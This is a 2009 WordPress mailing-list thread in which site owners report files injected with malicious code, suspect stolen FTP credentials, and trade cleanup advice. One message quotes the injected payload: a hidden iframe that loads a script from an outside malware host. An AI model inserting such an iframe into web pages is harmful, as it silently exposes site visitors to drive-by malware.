[wp-testers] Default.widgets.php Hacked? What to do?

Kirk M kmb42vt at gmail.com
Thu Jul 23 22:28:52 UTC 2009


Thankfully I've only gone in using FTP on 2 of them within the 
last 2 months so I (and they) should be okay. Still, I'll have 
to check the files on each of those 2 if not re-upgrade 2.8.2 
altogether just to be safe.

Such is life in the online world.

On 07/23/2009 06:22 PM, Chris Carter wrote:
> you might be in trouble...
>
> On Thu, Jul 23, 2009 at 5:08 PM, Kirk M<kmb42vt at gmail.com>  wrote:
>
>> Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my
>> sites for awhile rather than Windows at least until I get everything changed
>> around and my Windows parition fully scanned. I have several FTP accounts
>> configured, many are for other site owners who ask me to maintain their WP
>> powered sites. It definitely wouldn't do to have those get hacked.
>>
>>
>> On 07/23/2009 05:50 PM, Chris Carter wrote:
>>
>>> Change your pwds and scan away..  I used cpanel file manager for a while
>>> to
>>> make sure they stopped attacking .. looking at logs, it hits and is tagged
>>> with googlebot, but the IP's are strange
>>>
>>> Anyway, This virus looks for files with:
>>>
>>> index*.*
>>> default*.*
>>> main*.*
>>> home*.*
>>>
>>> (I built a static php includes site, and only files named like the above
>>> were affected)
>>>
>>> Also might want to check your CGI-BIN for files that look suspicious
>>>
>>> It's basically is a bot that logs in, finds any files in all directories
>>> that start with the above
>>>
>>> ...funny thing was that somtimes where they inject it, PHP code throws
>>> errors. They need to revise their bot to work outside the<? tags :)
>>>
>>> -Chris
>>> 314media.com
>>>
>>> On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh<navjotjsingh at gmail.com
>>>> wrote:
>>>
>>>   Yeah..my Wordpress mu install also got hacked. Just confirmed.
>>>>
>>>> On Fri, Jul 24, 2009 at 2:48 AM, dinu<hello at offlineblog.net>   wrote:
>>>>
>>>>> I had to restore from backup. the entire blog
>>>>> when I first saw Default.widgets.php hacked, I tried restoring only that
>>>>> page. But then I found hidden iframe codes on all of my pages (
>>>>> including
>>>>> pages after login )
>>>>>
>>>>> when I contacted Dreamhost support, they said it was an ftp hack. So, I
>>>>> would think its not a wordpress issue.
>>>>>
>>>>> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh<navjotjsingh at gmail.com
>>>>> wrote:
>>>>>
>>>>>   2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>>>>>>
>>>>>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua
>>>>>> Dunbar<josh2007 at findingjesustoday.com>   wrote:
>>>>>>
>>>>>>> What version of wordpress are you running?
>>>>>>>
>>>>>>> --------------------------------------------------
>>>>>>> From: "Chris Carter"<carter.chris at gmail.com>
>>>>>>> Sent: Thursday, July 23, 2009 3:43 PM
>>>>>>> To:<wp-testers at lists.automattic.com>
>>>>>>> Cc:<wp-testers at lists.automattic.com>;<
>>>>>>>
>>>>>> wp-hackers at lists.automattic.com>
>>>>
>>>>> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>>>>>>>
>>>>>>>   I keep getting hacked with that code inserted into
>>>>>>>>
>>>>>>> admin/default-filters
>>>>
>>>>>
>>>>>>>> Chris Carter
>>>>>>>> President
>>>>>>>> 314media.com
>>>>>>>> 314-714-5448
>>>>>>>>
>>>>>>>> On Jul 23, 2009, at 3:31 PM, Navjot Singh<navjotjsingh at gmail.com>
>>>>>>>>
>>>>>>>   wrote:
>>>>>>
>>>>>>>
>>>>>>>>   I have a blog running on 2.8.2 and suddenly now I find all index.php
>>>>>>>>> and wp-includes/Default.widgets.php hacked with following code
>>>>>>>>> inserted randomly :
>>>>>>>>>
>>>>>>>>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
>>>>>>>>> height=125 style="visibility: hidden"></iframe>
>>>>>>>>>
>>>>>>>>> How to prevent further hacking? I am currently replacing all the
>>>>>>>>>
>>>>>>>> files
>>>>
>>>>> affected since all of them affected at a certain date. I am on a
>>>>>>>>> shared hosting and only one blog got attacked.


More information about the wp-testers mailing list